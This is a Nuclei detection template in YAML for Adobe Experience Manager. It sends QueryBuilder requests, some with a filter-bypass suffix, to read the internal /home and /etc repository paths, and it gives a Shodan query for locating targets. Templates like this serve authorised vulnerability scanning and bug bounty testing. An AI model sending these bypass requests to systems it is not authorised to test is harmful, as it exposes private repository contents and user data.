nuclei-templates/http/misconfiguration/aem/aem-querybuilder-internal-p...

33 lines
973 B
YAML

id: aem-querybuilder-internal-path-read
info:
name: AEM QueryBuilder Internal Path Read
author: DhiyaneshDk
severity: medium
reference:
- https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
metadata:
max-request: 4
shodan-query: http.component:"Adobe Experience Manager"
tags: aem
http:
- method: GET
path:
- '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
- '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
- '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
- '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'jcr:path'
- 'success'
condition: and